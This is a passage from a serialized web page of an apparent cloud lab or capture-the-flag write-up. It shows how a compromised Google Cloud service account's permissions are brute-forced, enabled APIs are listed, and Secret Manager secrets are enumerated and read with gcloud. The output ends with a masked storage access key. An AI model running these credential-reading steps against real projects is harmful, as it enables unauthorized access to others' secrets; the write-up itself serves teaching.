resourcemanager.projects=get\n",{"type":32,"tag":127,"props":3432,"children":3433},{"class":129,"line":1050},[3434,3438,3442,3446,3450,3454],{"type":32,"tag":127,"props":3435,"children":3436},{"style":134},[3437],{"type":37,"value":519},{"type":32,"tag":127,"props":3439,"children":3440},{"style":522},[3441],{"type":37,"value":525},{"type":32,"tag":127,"props":3443,"children":3444},{"style":139},[3445],{"type":37,"value":3417},{"type":32,"tag":127,"props":3447,"children":3448},{"style":139},[3449],{"type":37,"value":576},{"type":32,"tag":127,"props":3451,"children":3452},{"style":139},[3453],{"type":37,"value":540},{"type":32,"tag":127,"props":3455,"children":3456},{"style":139},[3457],{"type":37,"value":3458}," secretmanager.secrets=get\n",{"type":32,"tag":127,"props":3460,"children":3461},{"class":129,"line":1062},[3462,3466,3470,3474,3478,3482],{"type":32,"tag":127,"props":3463,"children":3464},{"style":134},[3465],{"type":37,"value":519},{"type":32,"tag":127,"props":3467,"children":3468},{"style":522},[3469],{"type":37,"value":525},{"type":32,"tag":127,"props":3471,"children":3472},{"style":139},[3473],{"type":37,"value":3417},{"type":32,"tag":127,"props":3475,"children":3476},{"style":139},[3477],{"type":37,"value":576},{"type":32,"tag":127,"props":3479,"children":3480},{"style":139},[3481],{"type":37,"value":540},{"type":32,"tag":127,"props":3483,"children":3484},{"style":139},[3485],{"type":37,"value":3486}," 
secretmanager.secrets=get-iam-policy\n",{"type":32,"tag":127,"props":3488,"children":3489},{"class":129,"line":1075},[3490,3494,3498,3502,3506,3510],{"type":32,"tag":127,"props":3491,"children":3492},{"style":134},[3493],{"type":37,"value":519},{"type":32,"tag":127,"props":3495,"children":3496},{"style":522},[3497],{"type":37,"value":525},{"type":32,"tag":127,"props":3499,"children":3500},{"style":139},[3501],{"type":37,"value":3417},{"type":32,"tag":127,"props":3503,"children":3504},{"style":139},[3505],{"type":37,"value":576},{"type":32,"tag":127,"props":3507,"children":3508},{"style":139},[3509],{"type":37,"value":540},{"type":32,"tag":127,"props":3511,"children":3512},{"style":139},[3513],{"type":37,"value":3514}," secretmanager.secrets=list\n",{"type":32,"tag":127,"props":3516,"children":3517},{"class":129,"line":1088},[3518,3522,3526,3531,3535,3539],{"type":32,"tag":127,"props":3519,"children":3520},{"style":134},[3521],{"type":37,"value":519},{"type":32,"tag":127,"props":3523,"children":3524},{"style":522},[3525],{"type":37,"value":525},{"type":32,"tag":127,"props":3527,"children":3528},{"style":139},[3529],{"type":37,"value":3530}," 00:38:57",{"type":32,"tag":127,"props":3532,"children":3533},{"style":139},[3534],{"type":37,"value":576},{"type":32,"tag":127,"props":3536,"children":3537},{"style":139},[3538],{"type":37,"value":540},{"type":32,"tag":127,"props":3540,"children":3541},{"style":139},[3542],{"type":37,"value":3543}," 
run.routes=invoke\n",{"type":32,"tag":127,"props":3545,"children":3546},{"class":129,"line":1100},[3547,3551,3555,3559,3563,3567],{"type":32,"tag":127,"props":3548,"children":3549},{"style":134},[3550],{"type":37,"value":519},{"type":32,"tag":127,"props":3552,"children":3553},{"style":522},[3554],{"type":37,"value":525},{"type":32,"tag":127,"props":3556,"children":3557},{"style":139},[3558],{"type":37,"value":3530},{"type":32,"tag":127,"props":3560,"children":3561},{"style":139},[3562],{"type":37,"value":576},{"type":32,"tag":127,"props":3564,"children":3565},{"style":139},[3566],{"type":37,"value":540},{"type":32,"tag":127,"props":3568,"children":3569},{"style":139},[3570],{"type":37,"value":3571}," serviceusage.quotas=get\n",{"type":32,"tag":127,"props":3573,"children":3574},{"class":129,"line":1113},[3575,3579,3583,3587,3591,3595],{"type":32,"tag":127,"props":3576,"children":3577},{"style":134},[3578],{"type":37,"value":519},{"type":32,"tag":127,"props":3580,"children":3581},{"style":522},[3582],{"type":37,"value":525},{"type":32,"tag":127,"props":3584,"children":3585},{"style":139},[3586],{"type":37,"value":3530},{"type":32,"tag":127,"props":3588,"children":3589},{"style":139},[3590],{"type":37,"value":576},{"type":32,"tag":127,"props":3592,"children":3593},{"style":139},[3594],{"type":37,"value":540},{"type":32,"tag":127,"props":3596,"children":3597},{"style":139},[3598],{"type":37,"value":3599}," 
serviceusage.services=get\n",{"type":32,"tag":127,"props":3601,"children":3602},{"class":129,"line":1126},[3603,3607,3611,3615,3619,3623],{"type":32,"tag":127,"props":3604,"children":3605},{"style":134},[3606],{"type":37,"value":519},{"type":32,"tag":127,"props":3608,"children":3609},{"style":522},[3610],{"type":37,"value":525},{"type":32,"tag":127,"props":3612,"children":3613},{"style":139},[3614],{"type":37,"value":3530},{"type":32,"tag":127,"props":3616,"children":3617},{"style":139},[3618],{"type":37,"value":576},{"type":32,"tag":127,"props":3620,"children":3621},{"style":139},[3622],{"type":37,"value":540},{"type":32,"tag":127,"props":3624,"children":3625},{"style":139},[3626],{"type":37,"value":3627}," serviceusage.services=list\n",{"type":32,"tag":46,"props":3629,"children":3630},{},[3631],{"type":37,"value":3632},"When we brute-force the permissions of the new service account, we can see that many permissions are granted on the Compute service, but the output below shows that the Compute API is not enabled on the project.",{"type":32,"tag":113,"props":3634,"children":3635},{"lang":115},[3636],{"type":32,"tag":118,"props":3637,"children":3639},{"className":120,"code":3638,"language":115,"meta":7,"style":7},"$> gcloud compute networks list --project=$GCP_PROJ\nAPI [compute.googleapis.com] not enabled on project [gr-proj-4]. Would you like to enable and retry (this will take a few minutes)? 
(y/N)?\n\n$> gcloud services list\nNAME                                 TITLE\nanalyticshub.googleapis.com          Analytics Hub API\nbigquery.googleapis.com              BigQuery API\nbigqueryconnection.googleapis.com    BigQuery Connection API\nbigquerydatapolicy.googleapis.com    BigQuery Data Policy API\nbigquerymigration.googleapis.com     BigQuery Migration API\nbigqueryreservation.googleapis.com   BigQuery Reservation API\nbigquerystorage.googleapis.com       BigQuery Storage API\ncloudapis.googleapis.com             Google Cloud APIs\ncloudresourcemanager.googleapis.com  Cloud Resource Manager API\ncloudtrace.googleapis.com            Cloud Trace API\ndataform.googleapis.com              Dataform API\ndataplex.googleapis.com              Cloud Dataplex API\ndatastore.googleapis.com             Cloud Datastore API\niam.googleapis.com                   Identity and Access Management (IAM) API\niamcredentials.googleapis.com        IAM Service Account Credentials API\nlogging.googleapis.com               Cloud Logging API\nmonitoring.googleapis.com            Cloud Monitoring API\nsecretmanager.googleapis.com         Secret Manager API\nservicemanagement.googleapis.com     Service Management API\nserviceusage.googleapis.com          Service Usage API\nsql-component.googleapis.com         Cloud SQL\nstorage-api.googleapis.com           Google Cloud Storage JSON API\nstorage-component.googleapis.com     Cloud Storage\nstorage.googleapis.com               Cloud Storage 
API\n",[3640],{"type":32,"tag":104,"props":3641,"children":3642},{"__ignoreMap":7},[3643,3685,3773,3780,3805,3818,3841,3858,3880,3906,3928,3950,3972,3995,4022,4044,4061,4083,4105,4138,4170,4192,4213,4234,4255,4277,4295,4325,4343],{"type":32,"tag":127,"props":3644,"children":3645},{"class":129,"line":130},[3646,3651,3656,3660,3665,3670,3675,3680],{"type":32,"tag":127,"props":3647,"children":3648},{"style":134},[3649],{"type":37,"value":3650},"$",{"type":32,"tag":127,"props":3652,"children":3653},{"style":322},[3654],{"type":37,"value":3655},"> ",{"type":32,"tag":127,"props":3657,"children":3658},{"style":139},[3659],{"type":37,"value":109},{"type":32,"tag":127,"props":3661,"children":3662},{"style":139},[3663],{"type":37,"value":3664}," compute",{"type":32,"tag":127,"props":3666,"children":3667},{"style":139},[3668],{"type":37,"value":3669}," networks",{"type":32,"tag":127,"props":3671,"children":3672},{"style":139},[3673],{"type":37,"value":3674}," list",{"type":32,"tag":127,"props":3676,"children":3677},{"style":150},[3678],{"type":37,"value":3679}," --project=",{"type":32,"tag":127,"props":3681,"children":3682},{"style":139},[3683],{"type":37,"value":3684},"$GCP_PROJ\n",{"type":32,"tag":127,"props":3686,"children":3687},{"class":129,"line":361},[3688,3693,3698,3702,3707,3711,3716,3721,3726,3731,3736,3741,3746,3750,3755,3759,3764,3768],{"type":32,"tag":127,"props":3689,"children":3690},{"style":134},[3691],{"type":37,"value":3692},"API",{"type":32,"tag":127,"props":3694,"children":3695},{"style":322},[3696],{"type":37,"value":3697}," [compute.googleapis.com] not enabled on project 
",{"type":32,"tag":127,"props":3699,"children":3700},{"style":311},[3701],{"type":37,"value":343},{"type":32,"tag":127,"props":3703,"children":3704},{"style":322},[3705],{"type":37,"value":3706},"gr-proj-4",{"type":32,"tag":127,"props":3708,"children":3709},{"style":311},[3710],{"type":37,"value":353},{"type":32,"tag":127,"props":3712,"children":3713},{"style":322},[3714],{"type":37,"value":3715},". Would you like to enable and retry (",{"type":32,"tag":127,"props":3717,"children":3718},{"style":134},[3719],{"type":37,"value":3720},"this",{"type":32,"tag":127,"props":3722,"children":3723},{"style":139},[3724],{"type":37,"value":3725}," will",{"type":32,"tag":127,"props":3727,"children":3728},{"style":139},[3729],{"type":37,"value":3730}," take",{"type":32,"tag":127,"props":3732,"children":3733},{"style":139},[3734],{"type":37,"value":3735}," a",{"type":32,"tag":127,"props":3737,"children":3738},{"style":139},[3739],{"type":37,"value":3740}," few",{"type":32,"tag":127,"props":3742,"children":3743},{"style":139},[3744],{"type":37,"value":3745}," 
minutes",{"type":32,"tag":127,"props":3747,"children":3748},{"style":322},[3749],{"type":37,"value":2965},{"type":32,"tag":127,"props":3751,"children":3752},{"style":299},[3753],{"type":37,"value":3754},"?",{"type":32,"tag":127,"props":3756,"children":3757},{"style":322},[3758],{"type":37,"value":2851},{"type":32,"tag":127,"props":3760,"children":3761},{"style":134},[3762],{"type":37,"value":3763},"y/N",{"type":32,"tag":127,"props":3765,"children":3766},{"style":322},[3767],{"type":37,"value":2965},{"type":32,"tag":127,"props":3769,"children":3770},{"style":299},[3771],{"type":37,"value":3772},"?\n",{"type":32,"tag":127,"props":3774,"children":3775},{"class":129,"line":402},[3776],{"type":32,"tag":127,"props":3777,"children":3778},{"emptyLinePlaceholder":895},[3779],{"type":37,"value":898},{"type":32,"tag":127,"props":3781,"children":3782},{"class":129,"line":738},[3783,3787,3791,3795,3800],{"type":32,"tag":127,"props":3784,"children":3785},{"style":134},[3786],{"type":37,"value":3650},{"type":32,"tag":127,"props":3788,"children":3789},{"style":322},[3790],{"type":37,"value":3655},{"type":32,"tag":127,"props":3792,"children":3793},{"style":139},[3794],{"type":37,"value":109},{"type":32,"tag":127,"props":3796,"children":3797},{"style":139},[3798],{"type":37,"value":3799}," services",{"type":32,"tag":127,"props":3801,"children":3802},{"style":139},[3803],{"type":37,"value":3804}," list\n",{"type":32,"tag":127,"props":3806,"children":3807},{"class":129,"line":764},[3808,3813],{"type":32,"tag":127,"props":3809,"children":3810},{"style":134},[3811],{"type":37,"value":3812},"NAME",{"type":32,"tag":127,"props":3814,"children":3815},{"style":139},[3816],{"type":37,"value":3817},"                                 
TITLE\n",{"type":32,"tag":127,"props":3819,"children":3820},{"class":129,"line":803},[3821,3826,3831,3836],{"type":32,"tag":127,"props":3822,"children":3823},{"style":134},[3824],{"type":37,"value":3825},"analyticshub.googleapis.com",{"type":32,"tag":127,"props":3827,"children":3828},{"style":139},[3829],{"type":37,"value":3830},"          Analytics",{"type":32,"tag":127,"props":3832,"children":3833},{"style":139},[3834],{"type":37,"value":3835}," Hub",{"type":32,"tag":127,"props":3837,"children":3838},{"style":139},[3839],{"type":37,"value":3840}," API\n",{"type":32,"tag":127,"props":3842,"children":3843},{"class":129,"line":838},[3844,3849,3854],{"type":32,"tag":127,"props":3845,"children":3846},{"style":134},[3847],{"type":37,"value":3848},"bigquery.googleapis.com",{"type":32,"tag":127,"props":3850,"children":3851},{"style":139},[3852],{"type":37,"value":3853},"              BigQuery",{"type":32,"tag":127,"props":3855,"children":3856},{"style":139},[3857],{"type":37,"value":3840},{"type":32,"tag":127,"props":3859,"children":3860},{"class":129,"line":847},[3861,3866,3871,3876],{"type":32,"tag":127,"props":3862,"children":3863},{"style":134},[3864],{"type":37,"value":3865},"bigqueryconnection.googleapis.com",{"type":32,"tag":127,"props":3867,"children":3868},{"style":139},[3869],{"type":37,"value":3870},"    BigQuery",{"type":32,"tag":127,"props":3872,"children":3873},{"style":139},[3874],{"type":37,"value":3875}," Connection",{"type":32,"tag":127,"props":3877,"children":3878},{"style":139},[3879],{"type":37,"value":3840},{"type":32,"tag":127,"props":3881,"children":3882},{"class":129,"line":975},[3883,3888,3892,3897,3902],{"type":32,"tag":127,"props":3884,"children":3885},{"style":134},[3886],{"type":37,"value":3887},"bigquerydatapolicy.googleapis.com",{"type":32,"tag":127,"props":3889,"children":3890},{"style":139},[3891],{"type":37,"value":3870},{"type":32,"tag":127,"props":3893,"children":3894},{"style":139},[3895],{"type":37,"value":3896}," 
Data",{"type":32,"tag":127,"props":3898,"children":3899},{"style":139},[3900],{"type":37,"value":3901}," Policy",{"type":32,"tag":127,"props":3903,"children":3904},{"style":139},[3905],{"type":37,"value":3840},{"type":32,"tag":127,"props":3907,"children":3908},{"class":129,"line":987},[3909,3914,3919,3924],{"type":32,"tag":127,"props":3910,"children":3911},{"style":134},[3912],{"type":37,"value":3913},"bigquerymigration.googleapis.com",{"type":32,"tag":127,"props":3915,"children":3916},{"style":139},[3917],{"type":37,"value":3918},"     BigQuery",{"type":32,"tag":127,"props":3920,"children":3921},{"style":139},[3922],{"type":37,"value":3923}," Migration",{"type":32,"tag":127,"props":3925,"children":3926},{"style":139},[3927],{"type":37,"value":3840},{"type":32,"tag":127,"props":3929,"children":3930},{"class":129,"line":1000},[3931,3936,3941,3946],{"type":32,"tag":127,"props":3932,"children":3933},{"style":134},[3934],{"type":37,"value":3935},"bigqueryreservation.googleapis.com",{"type":32,"tag":127,"props":3937,"children":3938},{"style":139},[3939],{"type":37,"value":3940},"   BigQuery",{"type":32,"tag":127,"props":3942,"children":3943},{"style":139},[3944],{"type":37,"value":3945}," Reservation",{"type":32,"tag":127,"props":3947,"children":3948},{"style":139},[3949],{"type":37,"value":3840},{"type":32,"tag":127,"props":3951,"children":3952},{"class":129,"line":1013},[3953,3958,3963,3968],{"type":32,"tag":127,"props":3954,"children":3955},{"style":134},[3956],{"type":37,"value":3957},"bigquerystorage.googleapis.com",{"type":32,"tag":127,"props":3959,"children":3960},{"style":139},[3961],{"type":37,"value":3962},"       BigQuery",{"type":32,"tag":127,"props":3964,"children":3965},{"style":139},[3966],{"type":37,"value":3967}," 
Storage",{"type":32,"tag":127,"props":3969,"children":3970},{"style":139},[3971],{"type":37,"value":3840},{"type":32,"tag":127,"props":3973,"children":3974},{"class":129,"line":1025},[3975,3980,3985,3990],{"type":32,"tag":127,"props":3976,"children":3977},{"style":134},[3978],{"type":37,"value":3979},"cloudapis.googleapis.com",{"type":32,"tag":127,"props":3981,"children":3982},{"style":139},[3983],{"type":37,"value":3984},"             Google",{"type":32,"tag":127,"props":3986,"children":3987},{"style":139},[3988],{"type":37,"value":3989}," Cloud",{"type":32,"tag":127,"props":3991,"children":3992},{"style":139},[3993],{"type":37,"value":3994}," APIs\n",{"type":32,"tag":127,"props":3996,"children":3997},{"class":129,"line":1037},[3998,4003,4008,4013,4018],{"type":32,"tag":127,"props":3999,"children":4000},{"style":134},[4001],{"type":37,"value":4002},"cloudresourcemanager.googleapis.com",{"type":32,"tag":127,"props":4004,"children":4005},{"style":139},[4006],{"type":37,"value":4007},"  Cloud",{"type":32,"tag":127,"props":4009,"children":4010},{"style":139},[4011],{"type":37,"value":4012}," Resource",{"type":32,"tag":127,"props":4014,"children":4015},{"style":139},[4016],{"type":37,"value":4017}," Manager",{"type":32,"tag":127,"props":4019,"children":4020},{"style":139},[4021],{"type":37,"value":3840},{"type":32,"tag":127,"props":4023,"children":4024},{"class":129,"line":1050},[4025,4030,4035,4040],{"type":32,"tag":127,"props":4026,"children":4027},{"style":134},[4028],{"type":37,"value":4029},"cloudtrace.googleapis.com",{"type":32,"tag":127,"props":4031,"children":4032},{"style":139},[4033],{"type":37,"value":4034},"            Cloud",{"type":32,"tag":127,"props":4036,"children":4037},{"style":139},[4038],{"type":37,"value":4039}," 
Trace",{"type":32,"tag":127,"props":4041,"children":4042},{"style":139},[4043],{"type":37,"value":3840},{"type":32,"tag":127,"props":4045,"children":4046},{"class":129,"line":1062},[4047,4052,4057],{"type":32,"tag":127,"props":4048,"children":4049},{"style":134},[4050],{"type":37,"value":4051},"dataform.googleapis.com",{"type":32,"tag":127,"props":4053,"children":4054},{"style":139},[4055],{"type":37,"value":4056},"              Dataform",{"type":32,"tag":127,"props":4058,"children":4059},{"style":139},[4060],{"type":37,"value":3840},{"type":32,"tag":127,"props":4062,"children":4063},{"class":129,"line":1075},[4064,4069,4074,4079],{"type":32,"tag":127,"props":4065,"children":4066},{"style":134},[4067],{"type":37,"value":4068},"dataplex.googleapis.com",{"type":32,"tag":127,"props":4070,"children":4071},{"style":139},[4072],{"type":37,"value":4073},"              Cloud",{"type":32,"tag":127,"props":4075,"children":4076},{"style":139},[4077],{"type":37,"value":4078}," Dataplex",{"type":32,"tag":127,"props":4080,"children":4081},{"style":139},[4082],{"type":37,"value":3840},{"type":32,"tag":127,"props":4084,"children":4085},{"class":129,"line":1088},[4086,4091,4096,4101],{"type":32,"tag":127,"props":4087,"children":4088},{"style":134},[4089],{"type":37,"value":4090},"datastore.googleapis.com",{"type":32,"tag":127,"props":4092,"children":4093},{"style":139},[4094],{"type":37,"value":4095},"             Cloud",{"type":32,"tag":127,"props":4097,"children":4098},{"style":139},[4099],{"type":37,"value":4100}," Datastore",{"type":32,"tag":127,"props":4102,"children":4103},{"style":139},[4104],{"type":37,"value":3840},{"type":32,"tag":127,"props":4106,"children":4107},{"class":129,"line":1100},[4108,4113,4118,4123,4128,4133],{"type":32,"tag":127,"props":4109,"children":4110},{"style":134},[4111],{"type":37,"value":4112},"iam.googleapis.com",{"type":32,"tag":127,"props":4114,"children":4115},{"style":139},[4116],{"type":37,"value":4117},"                   
Identity",{"type":32,"tag":127,"props":4119,"children":4120},{"style":139},[4121],{"type":37,"value":4122}," and",{"type":32,"tag":127,"props":4124,"children":4125},{"style":139},[4126],{"type":37,"value":4127}," Access",{"type":32,"tag":127,"props":4129,"children":4130},{"style":139},[4131],{"type":37,"value":4132}," Management",{"type":32,"tag":127,"props":4134,"children":4135},{"style":322},[4136],{"type":37,"value":4137}," (IAM) API\n",{"type":32,"tag":127,"props":4139,"children":4140},{"class":129,"line":1113},[4141,4146,4151,4156,4161,4166],{"type":32,"tag":127,"props":4142,"children":4143},{"style":134},[4144],{"type":37,"value":4145},"iamcredentials.googleapis.com",{"type":32,"tag":127,"props":4147,"children":4148},{"style":139},[4149],{"type":37,"value":4150},"        IAM",{"type":32,"tag":127,"props":4152,"children":4153},{"style":139},[4154],{"type":37,"value":4155}," Service",{"type":32,"tag":127,"props":4157,"children":4158},{"style":139},[4159],{"type":37,"value":4160}," Account",{"type":32,"tag":127,"props":4162,"children":4163},{"style":139},[4164],{"type":37,"value":4165}," Credentials",{"type":32,"tag":127,"props":4167,"children":4168},{"style":139},[4169],{"type":37,"value":3840},{"type":32,"tag":127,"props":4171,"children":4172},{"class":129,"line":1126},[4173,4178,4183,4188],{"type":32,"tag":127,"props":4174,"children":4175},{"style":134},[4176],{"type":37,"value":4177},"logging.googleapis.com",{"type":32,"tag":127,"props":4179,"children":4180},{"style":139},[4181],{"type":37,"value":4182},"               Cloud",{"type":32,"tag":127,"props":4184,"children":4185},{"style":139},[4186],{"type":37,"value":4187}," 
Logging",{"type":32,"tag":127,"props":4189,"children":4190},{"style":139},[4191],{"type":37,"value":3840},{"type":32,"tag":127,"props":4193,"children":4194},{"class":129,"line":1138},[4195,4200,4204,4209],{"type":32,"tag":127,"props":4196,"children":4197},{"style":134},[4198],{"type":37,"value":4199},"monitoring.googleapis.com",{"type":32,"tag":127,"props":4201,"children":4202},{"style":139},[4203],{"type":37,"value":4034},{"type":32,"tag":127,"props":4205,"children":4206},{"style":139},[4207],{"type":37,"value":4208}," Monitoring",{"type":32,"tag":127,"props":4210,"children":4211},{"style":139},[4212],{"type":37,"value":3840},{"type":32,"tag":127,"props":4214,"children":4215},{"class":129,"line":1151},[4216,4221,4226,4230],{"type":32,"tag":127,"props":4217,"children":4218},{"style":134},[4219],{"type":37,"value":4220},"secretmanager.googleapis.com",{"type":32,"tag":127,"props":4222,"children":4223},{"style":139},[4224],{"type":37,"value":4225},"         Secret",{"type":32,"tag":127,"props":4227,"children":4228},{"style":139},[4229],{"type":37,"value":4017},{"type":32,"tag":127,"props":4231,"children":4232},{"style":139},[4233],{"type":37,"value":3840},{"type":32,"tag":127,"props":4235,"children":4236},{"class":129,"line":1164},[4237,4242,4247,4251],{"type":32,"tag":127,"props":4238,"children":4239},{"style":134},[4240],{"type":37,"value":4241},"servicemanagement.googleapis.com",{"type":32,"tag":127,"props":4243,"children":4244},{"style":139},[4245],{"type":37,"value":4246},"     
Service",{"type":32,"tag":127,"props":4248,"children":4249},{"style":139},[4250],{"type":37,"value":4132},{"type":32,"tag":127,"props":4252,"children":4253},{"style":139},[4254],{"type":37,"value":3840},{"type":32,"tag":127,"props":4256,"children":4257},{"class":129,"line":1176},[4258,4263,4268,4273],{"type":32,"tag":127,"props":4259,"children":4260},{"style":134},[4261],{"type":37,"value":4262},"serviceusage.googleapis.com",{"type":32,"tag":127,"props":4264,"children":4265},{"style":139},[4266],{"type":37,"value":4267},"          Service",{"type":32,"tag":127,"props":4269,"children":4270},{"style":139},[4271],{"type":37,"value":4272}," Usage",{"type":32,"tag":127,"props":4274,"children":4275},{"style":139},[4276],{"type":37,"value":3840},{"type":32,"tag":127,"props":4278,"children":4279},{"class":129,"line":1188},[4280,4285,4290],{"type":32,"tag":127,"props":4281,"children":4282},{"style":134},[4283],{"type":37,"value":4284},"sql-component.googleapis.com",{"type":32,"tag":127,"props":4286,"children":4287},{"style":139},[4288],{"type":37,"value":4289},"         Cloud",{"type":32,"tag":127,"props":4291,"children":4292},{"style":139},[4293],{"type":37,"value":4294}," SQL\n",{"type":32,"tag":127,"props":4296,"children":4297},{"class":129,"line":1201},[4298,4303,4308,4312,4316,4321],{"type":32,"tag":127,"props":4299,"children":4300},{"style":134},[4301],{"type":37,"value":4302},"storage-api.googleapis.com",{"type":32,"tag":127,"props":4304,"children":4305},{"style":139},[4306],{"type":37,"value":4307},"           Google",{"type":32,"tag":127,"props":4309,"children":4310},{"style":139},[4311],{"type":37,"value":3989},{"type":32,"tag":127,"props":4313,"children":4314},{"style":139},[4315],{"type":37,"value":3967},{"type":32,"tag":127,"props":4317,"children":4318},{"style":139},[4319],{"type":37,"value":4320}," 
JSON",{"type":32,"tag":127,"props":4322,"children":4323},{"style":139},[4324],{"type":37,"value":3840},{"type":32,"tag":127,"props":4326,"children":4327},{"class":129,"line":1213},[4328,4333,4338],{"type":32,"tag":127,"props":4329,"children":4330},{"style":134},[4331],{"type":37,"value":4332},"storage-component.googleapis.com",{"type":32,"tag":127,"props":4334,"children":4335},{"style":139},[4336],{"type":37,"value":4337},"     Cloud",{"type":32,"tag":127,"props":4339,"children":4340},{"style":139},[4341],{"type":37,"value":4342}," Storage\n",{"type":32,"tag":127,"props":4344,"children":4345},{"class":129,"line":1225},[4346,4351,4355,4359],{"type":32,"tag":127,"props":4347,"children":4348},{"style":134},[4349],{"type":37,"value":4350},"storage.googleapis.com",{"type":32,"tag":127,"props":4352,"children":4353},{"style":139},[4354],{"type":37,"value":4182},{"type":32,"tag":127,"props":4356,"children":4357},{"style":139},[4358],{"type":37,"value":3967},{"type":32,"tag":127,"props":4360,"children":4361},{"style":139},[4362],{"type":37,"value":3840},{"type":32,"tag":46,"props":4364,"children":4365},{},[4366],{"type":37,"value":4367},"We can also see that we have rights on the secrets that we can enumerate with the following command:",{"type":32,"tag":113,"props":4369,"children":4370},{"lang":115},[4371],{"type":32,"tag":118,"props":4372,"children":4374},{"className":120,"code":4373,"language":115,"meta":7,"style":7},"$> gcloud secrets list --project=$GCP_PROJ\nNAME              CREATED              REPLICATION_POLICY  LOCATIONS\npayments          2025-04-02T14:36:59  automatic           -\npayments-storage  2025-04-02T16:25:57  automatic           -\n\n$> gcloud secrets versions access latest --secret=payments-storage  --project=$GCP_PROJ\ngr-stripe\n\n$> gcloud secrets versions access latest --secret=payments  
--project=$GCP_PROJ\nGOOG1E6CZ32****************************************\nHh**************************************\n",[4375],{"type":32,"tag":104,"props":4376,"children":4377},{"__ignoreMap":7},[4378,4410,4432,4455,4476,4483,4531,4539,4546,4590,4598],{"type":32,"tag":127,"props":4379,"children":4380},{"class":129,"line":130},[4381,4385,4389,4393,4398,4402,4406],{"type":32,"tag":127,"props":4382,"children":4383},{"style":134},[4384],{"type":37,"value":3650},{"type":32,"tag":127,"props":4386,"children":4387},{"style":322},[4388],{"type":37,"value":3655},{"type":32,"tag":127,"props":4390,"children":4391},{"style":139},[4392],{"type":37,"value":109},{"type":32,"tag":127,"props":4394,"children":4395},{"style":139},[4396],{"type":37,"value":4397}," secrets",{"type":32,"tag":127,"props":4399,"children":4400},{"style":139},[4401],{"type":37,"value":3674},{"type":32,"tag":127,"props":4403,"children":4404},{"style":150},[4405],{"type":37,"value":3679},{"type":32,"tag":127,"props":4407,"children":4408},{"style":139},[4409],{"type":37,"value":3684},{"type":32,"tag":127,"props":4411,"children":4412},{"class":129,"line":361},[4413,4417,4422,4427],{"type":32,"tag":127,"props":4414,"children":4415},{"style":134},[4416],{"type":37,"value":3812},{"type":32,"tag":127,"props":4418,"children":4419},{"style":139},[4420],{"type":37,"value":4421},"              CREATED",{"type":32,"tag":127,"props":4423,"children":4424},{"style":139},[4425],{"type":37,"value":4426},"              REPLICATION_POLICY",{"type":32,"tag":127,"props":4428,"children":4429},{"style":139},[4430],{"type":37,"value":4431},"  LOCATIONS\n",{"type":32,"tag":127,"props":4433,"children":4434},{"class":129,"line":402},[4435,4440,4445,4450],{"type":32,"tag":127,"props":4436,"children":4437},{"style":134},[4438],{"type":37,"value":4439},"payments",{"type":32,"tag":127,"props":4441,"children":4442},{"style":139},[4443],{"type":37,"value":4444},"          
2025-04-02T14:36:59",{"type":32,"tag":127,"props":4446,"children":4447},{"style":139},[4448],{"type":37,"value":4449},"  automatic",{"type":32,"tag":127,"props":4451,"children":4452},{"style":139},[4453],{"type":37,"value":4454},"           -\n",{"type":32,"tag":127,"props":4456,"children":4457},{"class":129,"line":738},[4458,4463,4468,4472],{"type":32,"tag":127,"props":4459,"children":4460},{"style":134},[4461],{"type":37,"value":4462},"payments-storage",{"type":32,"tag":127,"props":4464,"children":4465},{"style":139},[4466],{"type":37,"value":4467},"  2025-04-02T16:25:57",{"type":32,"tag":127,"props":4469,"children":4470},{"style":139},[4471],{"type":37,"value":4449},{"type":32,"tag":127,"props":4473,"children":4474},{"style":139},[4475],{"type":37,"value":4454},{"type":32,"tag":127,"props":4477,"children":4478},{"class":129,"line":764},[4479],{"type":32,"tag":127,"props":4480,"children":4481},{"emptyLinePlaceholder":895},[4482],{"type":37,"value":898},{"type":32,"tag":127,"props":4484,"children":4485},{"class":129,"line":803},[4486,4490,4494,4498,4502,4507,4512,4517,4522,4527],{"type":32,"tag":127,"props":4487,"children":4488},{"style":134},[4489],{"type":37,"value":3650},{"type":32,"tag":127,"props":4491,"children":4492},{"style":322},[4493],{"type":37,"value":3655},{"type":32,"tag":127,"props":4495,"children":4496},{"style":139},[4497],{"type":37,"value":109},{"type":32,"tag":127,"props":4499,"children":4500},{"style":139},[4501],{"type":37,"value":4397},{"type":32,"tag":127,"props":4503,"children":4504},{"style":139},[4505],{"type":37,"value":4506}," versions",{"type":32,"tag":127,"props":4508,"children":4509},{"style":139},[4510],{"type":37,"value":4511}," access",{"type":32,"tag":127,"props":4513,"children":4514},{"style":139},[4515],{"type":37,"value":4516}," latest",{"type":32,"tag":127,"props":4518,"children":4519},{"style":150},[4520],{"type":37,"value":4521}," 
--secret=payments-storage",{"type":32,"tag":127,"props":4523,"children":4524},{"style":150},[4525],{"type":37,"value":4526},"  --project=",{"type":32,"tag":127,"props":4528,"children":4529},{"style":139},[4530],{"type":37,"value":3684},{"type":32,"tag":127,"props":4532,"children":4533},{"class":129,"line":838},[4534],{"type":32,"tag":127,"props":4535,"children":4536},{"style":134},[4537],{"type":37,"value":4538},"gr-stripe\n",{"type":32,"tag":127,"props":4540,"children":4541},{"class":129,"line":847},[4542],{"type":32,"tag":127,"props":4543,"children":4544},{"emptyLinePlaceholder":895},[4545],{"type":37,"value":898},{"type":32,"tag":127,"props":4547,"children":4548},{"class":129,"line":975},[4549,4553,4557,4561,4565,4569,4573,4577,4582,4586],{"type":32,"tag":127,"props":4550,"children":4551},{"style":134},[4552],{"type":37,"value":3650},{"type":32,"tag":127,"props":4554,"children":4555},{"style":322},[4556],{"type":37,"value":3655},{"type":32,"tag":127,"props":4558,"children":4559},{"style":139},[4560],{"type":37,"value":109},{"type":32,"tag":127,"props":4562,"children":4563},{"style":139},[4564],{"type":37,"value":4397},{"type":32,"tag":127,"props":4566,"children":4567},{"style":139},[4568],{"type":37,"value":4506},{"type":32,"tag":127,"props":4570,"children":4571},{"style":139},[4572],{"type":37,"value":4511},{"type":32,"tag":127,"props":4574,"children":4575},{"style":139},[4576],{"type":37,"value":4516},{"type":32,"tag":127,"props":4578,"children":4579},{"style":150},[4580],{"type":37,"value":4581}," 
